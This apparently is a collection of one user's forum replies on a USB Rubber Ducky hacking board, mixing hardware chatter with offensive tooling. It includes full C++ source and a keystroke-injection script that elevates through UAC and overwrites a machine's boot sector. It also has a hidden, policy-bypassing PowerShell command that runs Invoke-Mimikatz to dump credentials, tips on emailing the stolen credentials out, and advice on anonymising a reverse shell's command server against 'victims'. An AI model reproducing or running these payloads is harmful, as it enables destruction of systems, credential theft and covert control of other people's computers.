[Anonymous reverse shell]

How about using Domain Fronting?

10 hours ago, Hackerman said:

Thanks for your replies!

Reverse shell anonymity sounds pretty complicated, so is there another way to take control of victims machine that could be more anonymous than reverse shell? For example is it possible to set victims machine as “server” and then connect to it through tor or VPN? Does anyone have any idea?

You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.

[What's your PC's specs?]

be quiet! Silent Base 800 Black, No Window
ASUS Prime X370-Pro
AMD Ryzen 7 1700X
2x8GB Vengeance DDR4-3200
be quiet! Silent Loop 120mm
MSI GTX 770
Samsung 850 Evo 250GB SSD
550 Watt Corsair Semi Modular PSU (dont know the actual name rn)

Wanted to buy a new GPU for Machine Learning but prices are so damn high...

[Problem with de accent mark, problemas con los accentos]

Did you changed the Keyboard layout to "es" when compiling the duckyscript?

[duck_it.sh]

Reminds me of my PyDuckGen.

But seems like your script works ;) (I have a look if i can improve your script)

[Boot, inject keystrokes from BIOS]

I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx

[Hidden/Undetected/Reboot persistent Meterpreter in under 5 seconds w/Smart privilege escalation]

I dont have the original one just my modified version from PyDuckGen: Click

[pb powershell variable]

On 20.10.2017 at 2:23 PM, denisit said:

STRING ="K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS"

this is wrong no quotes and = are needed to it should look like this:

STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS

 

[Simple script]

13 hours ago, Dave-ee Jones said:

$RANDOM

You could generate a random number and do a switch of some kind?

if __NUMBER__ is 1:
	Q STRING "IT'S 1!"
else if __NUMBER__ is 2:
	Q STRING "Oh boi. It's 2."
...

Down further in that page it actually gives an example of throwing a dice.

that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.

[Simple script]

As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?

[Little Laptop]

1 hour ago, i8igmac said:

I was thinking a chromebook with intel chip. I don't see any one talking about them here.

 

my wife has one with a intel chip. I have been itching to fire up linux. I have read its hardware works out of the box.

 

They are cheap.

 

The toucch sccreen might perform well with gnome shell3 and will give it a greate tablet style user interface...

 

Long battery life.

The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)

[Problem with Metasploit Shell]

I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them.

This is basic metasploit stuff... maybe you should have a look at metasploit minute.

[[DANGEROUS] Nyancat Bootloader Overwrite]

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	char *pathToBin = "boot.bin";
	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			if (size > 0){
				byte *mbr = new byte[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfuly read!" << std::endl;
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overritten successfuly!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(binary);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	CloseHandle(drive);
    return 0;
}

2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired uac alt + key kombo (y for yes in english , j for german etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER

 

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier

 

boot.exe

[Installing drivers on target machines issue]

Nope no solution except what you already said: Delay

[I dont get this]

2 hours ago, JeepartN said:

it works now with the new sd card however in my script i want to use a powershell command that has a - in it. But when it puts in the command i get a + instead

try encoding in your keyboard layout (default is US)

[Download a file WITHOUT powershell]

You can run powershell and cmd without admin privs or am i mistaken?

e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.

[VPN]

I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!

[Help with Output]

Are you sure that php is enabled in your apache or IIS webserver?

try to place a php file e.g test.php in the webdirectory root with the following content:

<?php
phpinfo();
?>

if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.

 

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz

REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

[Best Firmware for Ducky Rubber?]

The c_duck_v2.1.hex is the standart TwinDuck Firmware which mounts your Ducky as a HID Keyboard and USB Storage Device. The payload starts as soon as you plug it in. This is probably want you want to use.

[HOW play .exe or another file inside DUCKY]

Flash the TwinDuck Firmware, which allows the ducky to be seen as a USB Storage Device and a HID Keyboard.

The call your SDCard 'DUCKY' and use this script:

for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d

%duck& stores the drive letter of your ducky :)

[A question about scripting]

Use something like:

Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want.

ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.

[About the 15 seconds password hack]

As far as i know it should show any output since it only writes a file in the current folder (e.g /var/www/html or sth).

[New To Ducky And Have Some Questions.]

It should work as long as there are corresponding hotkeys to do the things you want :)

[Accidentially deleted the inject.bin file :(]

10 hours ago, Willhall996 said:

Can anyone tell me what other files, if any, are on the memory card with the inject.bin file. lost the original card and also if it has to be formatted in any specific manor? 

FAT32. and no only the inject.bin since this was just the hello world payload. as already said use the java encoder to encode your raw txt payload into the inject.bin

[Running from Windows 10]

I use this one to find a drive labeled ducky(works in win 10/8/7)

for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d

%duck% contains your ducky drive letter.

[[Release] duckyRAT: Rubber Ducky RAT]

On 9.6.2017 at 5:38 PM, ItsKorma (YT) said:

I need help im new to this, i just got usb rubber ducky. its bit hard for me to get around it at the moment, but what you just said is what im looking for i want to be able to view victim screen or control it, able to look at the files etc. Please help me step by step. 

Sounds like you need a Basic Metasploit payload (dont worry about the stealth /undetected part for now). Have a look at Metasploit Minute for Tutorials about Metasploit.